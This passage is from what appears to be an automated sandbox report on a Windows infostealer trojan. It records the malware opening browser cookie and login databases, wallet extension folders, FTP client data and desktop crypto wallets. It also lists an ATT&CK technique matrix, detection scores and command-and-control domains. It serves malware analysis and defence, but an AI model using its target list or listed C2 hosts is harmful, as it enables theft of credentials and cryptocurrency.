                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                    Source: Yara match | File source: 00000000.00000002.2391091654.0000000003038000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2390650962.000000000092D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: 5Z19n7XRT1.exe PID: 3524, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: 0.2.5Z19n7XRT1.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.3.5Z19n7XRT1.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.5Z19n7XRT1.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.3.5Z19n7XRT1.exe.24e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000003.2160718112.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                    Tactic | Techniques (number in parentheses = count shown in the report's matrix)
                    Reconnaissance | Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
                    Resource Development | Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
                    Initial Access | Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
                    Execution | Windows Management Instrumentation (1); PowerShell (1); At; Cron; Launchd; Scheduled Task
                    Persistence | DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                    Privilege Escalation | Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                    Defense Evasion | Virtualization/Sandbox Evasion (1); Process Injection (1); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (4); Software Packing (22); DLL Side-Loading (1)
                    Credential Access | OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
                    Discovery | Security Software Discovery (11); Virtualization/Sandbox Evasion (1); Process Discovery (1); File and Directory Discovery (1); System Information Discovery (22); Wi-Fi Discovery
                    Lateral Movement | Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
                    Collection | Screen Capture (1); Archive Collected Data (1); Data from Local System (41); Clipboard Data (2); Keylogging; GUI Input Capture
                    Command and Control | Encrypted Channel (21); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication
                    Exfiltration | Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
                    Impact | Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop



                    Source | Detection | Scanner | Label
                    5Z19n7XRT1.exe | 55% | ReversingLabs | Win32.Trojan.AceCrypter
                    5Z19n7XRT1.exe | 100% | Joe Sandbox ML |
                    No Antivirus matches
                    Source | Detection | Scanner | Label
                    https://scentniej.buzz/IP | 100% | Avira URL Cloud | malware
                    https://lev-tolstoi.com/api1Wu | 100% | Avira URL Cloud | malware
                    https://lev-tolstoi.com/KP | 100% | Avira URL Cloud | malware
                    https://scentniej.buzz/ | 100% | Avira URL Cloud | malware
                    https://rebuildeso.buzz/ | 100% | Avira URL Cloud | malware
                    https://screwamusresz.buzz/api3 | 100% | Avira URL Cloud | malware
                    https://lev-tolstoi.com/.co.jp | 100% | Avira URL Cloud | malware
                    https://scentniej.buzz/api | 100% | Avira URL Cloud | malware
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    steamcommunity.com | 23.55.153.106 | true | false | | high
                    lev-tolstoi.com | 104.21.66.86 | true | false | | high
                    cashfuzysao.buzz | unknown | unknown | false | | high
                    scentniej.buzz | unknown | unknown | false | | high
                    inherineau.buzz | unknown | unknown | false | | high
                    prisonyfork.buzz | unknown | unknown | false | | high
                    rebuildeso.buzz | unknown | unknown | false | | high
                    appliacnesot.buzz | unknown | unknown | false | | high
                    hummskitnj.buzz | unknown | unknown | false | | high
                    screwamusresz.buzz | unknown | unknown | false | | high
                    Name | Malicious | Antivirus Detection | Reputation
                    scentniej.buzz | false | | high
                    https://steamcommunity.com/profiles/76561199724331900 | false | | high
                    rebuildeso.buzz | false | | high
                    appliacnesot.buzz | false | | high
                    screwamusresz.buzz | false | | high
                    cashfuzysao.buzz | false | | high
                    inherineau.buzz | false | | high
                    https://lev-tolstoi.com/api | false | | high
                    hummskitnj.buzz | false | | high
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://duckduckgo.com/chrome_newtab | 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://player.vimeo.com | 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://duckduckgo.com/ac/?q= | 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://steamcommunity.com/?subsection=broadcasts | 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://store.steampowered.com/subscriber_agreement/ | 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://www.gstatic.cn/recaptcha/ | 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    http://www.valvesoftware.com/legal.htm | 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.youtube.com5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.google.com5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af65Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2200239733.000000000095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://s.ytimg.com;5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=15Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2245459003.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://community.fastly.steamstatic.com/5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2200239733.000000000095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://steam.tv/5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://lev-tolstoi.com/KP5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          unknown
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://lev-tolstoi.com/5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000091F000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221183170.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221183170.000000000094D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221455502.000000000095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://store.steampowered.com/privacy_agreement/5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2245459003.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
